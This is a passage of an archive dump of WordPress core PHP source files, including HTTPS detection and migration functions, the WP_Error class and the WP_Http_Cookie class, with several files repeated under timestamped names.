$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-error-20260604233552.php 0000666 00000016516 15224151220 0011531 0 ustar 00 <?php
/**
* WordPress Error API.
*
* @package WordPress
*/
/**
* WordPress Error class.
*
* Container for checking for WordPress errors and error messages. Return
* WP_Error and use is_wp_error() to check if this class is returned. Many
* core WordPress functions pass this class in the event of an error and
* if not handled properly will result in code errors.
*
* @since 2.1.0
*/
#[AllowDynamicProperties]
class WP_Error {
/**
* Stores the list of errors.
*
* @since 2.1.0
* @var array
*/
public $errors = array();
/**
* Stores the most recently added data for each error code.
*
* @since 2.1.0
* @var array
*/
public $error_data = array();
/**
* Stores previously added data added for error codes, oldest-to-newest by code.
*
* @since 5.6.0
* @var array[]
*/
protected $additional_data = array();
/**
* Initializes the error.
*
* If `$code` is empty, the other parameters will be ignored.
* When `$code` is not empty, `$message` will be used even if
* it is empty. The `$data` parameter will be used only if it
* is not empty.
*
* Though the class is constructed with a single error code and
* message, multiple codes can be added using the `add()` method.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function __construct( $code = '', $message = '', $data = '' ) {
if ( empty( $code ) ) {
return;
}
$this->add( $code, $message, $data );
}
/**
* Retrieves all error codes.
*
* @since 2.1.0
*
* @return array List of error codes, if available.
*/
public function get_error_codes() {
if ( ! $this->has_errors() ) {
return array();
}
return array_keys( $this->errors );
}
/**
* Retrieves the first error code available.
*
* @since 2.1.0
*
* @return string|int Empty string, if no error codes.
*/
public function get_error_code() {
$codes = $this->get_error_codes();
if ( empty( $codes ) ) {
return '';
}
return $codes[0];
}
/**
* Retrieves all error messages, or the error messages for the given error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the messages for.
* Default empty string.
* @return string[] Error strings on success, or empty array if there are none.
*/
public function get_error_messages( $code = '' ) {
// Return all messages if no code specified.
if ( empty( $code ) ) {
$all_messages = array();
foreach ( (array) $this->errors as $code => $messages ) {
$all_messages = array_merge( $all_messages, $messages );
}
return $all_messages;
}
if ( isset( $this->errors[ $code ] ) ) {
return $this->errors[ $code ];
} else {
return array();
}
}
/**
* Gets a single error message.
*
* This will get the first message available for the code. If no code is
* given then the first code available will be used.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the message for.
* Default empty string.
* @return string The error message.
*/
public function get_error_message( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$messages = $this->get_error_messages( $code );
if ( empty( $messages ) ) {
return '';
}
return $messages[0];
}
/**
* Retrieves the most recently added error data for an error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code. Default empty string.
* @return mixed Error data, if it exists.
*/
public function get_error_data( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
return $this->error_data[ $code ];
}
}
/**
* Verifies if the instance contains errors.
*
* @since 5.1.0
*
* @return bool If the instance contains errors.
*/
public function has_errors() {
if ( ! empty( $this->errors ) ) {
return true;
}
return false;
}
/**
* Adds an error or appends an additional message to an existing error.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function add( $code, $message, $data = '' ) {
$this->errors[ $code ][] = $message;
if ( ! empty( $data ) ) {
$this->add_data( $data, $code );
}
/**
* Fires when an error is added to a WP_Error object.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Error data. Might be empty.
* @param WP_Error $wp_error The WP_Error object.
*/
do_action( 'wp_error_added', $code, $message, $data, $this );
}
/**
* Adds data to an error with the given code.
*
* @since 2.1.0
* @since 5.6.0 Errors can now contain more than one item of error data. {@see WP_Error::$additional_data}.
*
* @param mixed $data Error data.
* @param string|int $code Error code.
*/
public function add_data( $data, $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
if ( isset( $this->error_data[ $code ] ) ) {
$this->additional_data[ $code ][] = $this->error_data[ $code ];
}
$this->error_data[ $code ] = $data;
}
/**
* Retrieves all error data for an error code in the order in which the data was added.
*
* @since 5.6.0
*
* @param string|int $code Error code.
* @return mixed[] Array of error data, if it exists.
*/
public function get_all_error_data( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$data = array();
if ( isset( $this->additional_data[ $code ] ) ) {
$data = $this->additional_data[ $code ];
}
if ( isset( $this->error_data[ $code ] ) ) {
$data[] = $this->error_data[ $code ];
}
return $data;
}
/**
* Removes the specified error.
*
* This function removes all error messages associated with the specified
* error code, along with any error data for that code.
*
* @since 4.1.0
*
* @param string|int $code Error code.
*/
public function remove( $code ) {
unset( $this->errors[ $code ] );
unset( $this->error_data[ $code ] );
unset( $this->additional_data[ $code ] );
}
/**
* Merges the errors in the given error object into this one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to merge.
*/
public function merge_from( WP_Error $error ) {
static::copy_errors( $error, $this );
}
/**
* Exports the errors in this object into the given one.
*
* @since 5.6.0
*
* @param WP_Error $error Error object to export into.
*/
public function export_to( WP_Error $error ) {
static::copy_errors( $this, $error );
}
/**
* Copies errors from one WP_Error instance to another.
*
* @since 5.6.0
*
* @param WP_Error $from The WP_Error to copy from.
* @param WP_Error $to The WP_Error to copy to.
*/
protected static function copy_errors( WP_Error $from, WP_Error $to ) {
foreach ( $from->get_error_codes() as $code ) {
foreach ( $from->get_error_messages( $code ) as $error_message ) {
$to->add( $code, $error_message );
}
foreach ( $from->get_all_error_data( $code ) as $data ) {
$to->add_data( $data, $code );
}
}
}
}
https-migration-20260607015444-20260621191831.php 0000666 00000011205 15224151220 0013360 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605112545-20260621081205-20260621144346.php 0000666 00000013341 15224151220 0014725 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-http-cookie.php 0000666 00000016335 15224151220 0011240 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Cookie class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to encapsulate a single cookie object for internal use.
*
* Returned cookies are represented using this class, and when cookies are set, if they are not
* already a WP_Http_Cookie() object, then they are turned into one.
*
* @todo The WordPress convention is to use underscores instead of camelCase for function and method
* names. Need to switch to use underscores instead for the methods.
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_Http_Cookie {
/**
* Cookie name.
*
* @since 2.8.0
*
* @var string
*/
public $name;
/**
* Cookie value.
*
* @since 2.8.0
*
* @var string
*/
public $value;
/**
* When the cookie expires. Unix timestamp or formatted date.
*
* @since 2.8.0
*
* @var string|int|null
*/
public $expires;
/**
* Cookie URL path.
*
* @since 2.8.0
*
* @var string
*/
public $path;
/**
* Cookie Domain.
*
* @since 2.8.0
*
* @var string
*/
public $domain;
/**
* Cookie port or comma-separated list of ports.
*
* @since 2.8.0
*
* @var int|string
*/
public $port;
/**
* host-only flag.
*
* @since 5.2.0
*
* @var bool
*/
public $host_only;
/**
* Sets up this cookie object.
*
* The parameter $data should be either an associative array containing the indices names below
* or a header string detailing it.
*
* @since 2.8.0
* @since 5.2.0 Added `host_only` to the `$data` parameter.
*
* @param string|array $data {
* Raw cookie data as header string or data array.
*
* @type string $name Cookie name.
* @type mixed $value Value. Should NOT already be urlencoded.
* @type string|int|null $expires Optional. Unix timestamp or formatted date. Default null.
* @type string $path Optional. Path. Default '/'.
* @type string $domain Optional. Domain. Default host of parsed $requested_url.
* @type int|string $port Optional. Port or comma-separated list of ports. Default null.
* @type bool $host_only Optional. host-only storage flag. Default true.
* }
* @param string $requested_url The URL which the cookie was set on, used for default $domain
* and $port values.
*/
public function __construct( $data, $requested_url = '' ) {
if ( $requested_url ) {
$parsed_url = parse_url( $requested_url );
}
if ( isset( $parsed_url['host'] ) ) {
$this->domain = $parsed_url['host'];
}
$this->path = isset( $parsed_url['path'] ) ? $parsed_url['path'] : '/';
if ( ! str_ends_with( $this->path, '/' ) ) {
$this->path = dirname( $this->path ) . '/';
}
if ( is_string( $data ) ) {
// Assume it's a header string direct from a previous request.
$pairs = explode( ';', $data );
// Special handling for first pair; name=value. Also be careful of "=" in value.
$name = trim( substr( $pairs[0], 0, strpos( $pairs[0], '=' ) ) );
$value = substr( $pairs[0], strpos( $pairs[0], '=' ) + 1 );
$this->name = $name;
$this->value = urldecode( $value );
// Removes name=value from items.
array_shift( $pairs );
// Set everything else as a property.
foreach ( $pairs as $pair ) {
$pair = rtrim( $pair );
// Handle the cookie ending in ; which results in an empty final pair.
if ( empty( $pair ) ) {
continue;
}
list( $key, $val ) = strpos( $pair, '=' ) ? explode( '=', $pair ) : array( $pair, '' );
$key = strtolower( trim( $key ) );
if ( 'expires' === $key ) {
$val = strtotime( $val );
}
$this->$key = $val;
}
} else {
if ( ! isset( $data['name'] ) ) {
return;
}
// Set properties based directly on parameters.
foreach ( array( 'name', 'value', 'path', 'domain', 'port', 'host_only' ) as $field ) {
if ( isset( $data[ $field ] ) ) {
$this->$field = $data[ $field ];
}
}
if ( isset( $data['expires'] ) ) {
$this->expires = is_int( $data['expires'] ) ? $data['expires'] : strtotime( $data['expires'] );
} else {
$this->expires = null;
}
}
}
/**
* Confirms that it's OK to send this cookie to the URL checked against.
*
* Decision is based on RFC 2109/2965, so look there for details on validity.
*
* @since 2.8.0
*
* @param string $url URL you intend to send this cookie to
* @return bool true if allowed, false otherwise.
*/
public function test( $url ) {
if ( is_null( $this->name ) ) {
return false;
}
// Expires - if expired then nothing else matters.
if ( isset( $this->expires ) && time() > $this->expires ) {
return false;
}
// Get details on the URL we're thinking about sending to.
$url = parse_url( $url );
$url['port'] = isset( $url['port'] ) ? $url['port'] : ( 'https' === $url['scheme'] ? 443 : 80 );
$url['path'] = isset( $url['path'] ) ? $url['path'] : '/';
// Values to use for comparison against the URL.
$path = isset( $this->path ) ? $this->path : '/';
$port = isset( $this->port ) ? $this->port : null;
$domain = isset( $this->domain ) ? strtolower( $this->domain ) : strtolower( $url['host'] );
if ( false === stripos( $domain, '.' ) ) {
$domain .= '.local';
}
// Host - very basic check that the request URL ends with the domain restriction (minus leading dot).
$domain = ( str_starts_with( $domain, '.' ) ) ? substr( $domain, 1 ) : $domain;
if ( ! str_ends_with( $url['host'], $domain ) ) {
return false;
}
// Port - supports "port-lists" in the format: "80,8000,8080".
if ( ! empty( $port ) && ! in_array( $url['port'], array_map( 'intval', explode( ',', $port ) ), true ) ) {
return false;
}
// Path - request path must start with path restriction.
if ( ! str_starts_with( $url['path'], $path ) ) {
return false;
}
return true;
}
/**
* Convert cookie name and value back to header string.
*
* @since 2.8.0
*
* @return string Header encoded cookie name and value.
*/
public function getHeaderValue() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid
if ( ! isset( $this->name ) || ! isset( $this->value ) ) {
return '';
}
/**
* Filters the header-encoded cookie value.
*
* @since 3.4.0
*
* @param string $value The cookie value.
* @param string $name The cookie name.
*/
return $this->name . '=' . apply_filters( 'wp_http_cookie_value', $this->value, $this->name );
}
/**
* Retrieve cookie header for usage in the rest of the WordPress HTTP API.
*
* @since 2.8.0
*
* @return string
*/
public function getFullHeader() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid
return 'Cookie: ' . $this->getHeaderValue();
}
/**
* Retrieves cookie attributes.
*
* @since 4.6.0
*
* @return array {
* List of attributes.
*
* @type string|int|null $expires When the cookie expires. Unix timestamp or formatted date.
* @type string $path Cookie URL path.
* @type string $domain Cookie domain.
* }
*/
public function get_attributes() {
return array(
'expires' => $this->expires,
'path' => $this->path,
'domain' => $this->domain,
);
}
}
https-migration-20260605104304.php 0000666 00000011205 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605114255-20260621081205-20260621145629.php 0000666 00000013341 15224151220 0014732 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605091832-20260621191936.php 0000666 00000013341 15224151220 0013361 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
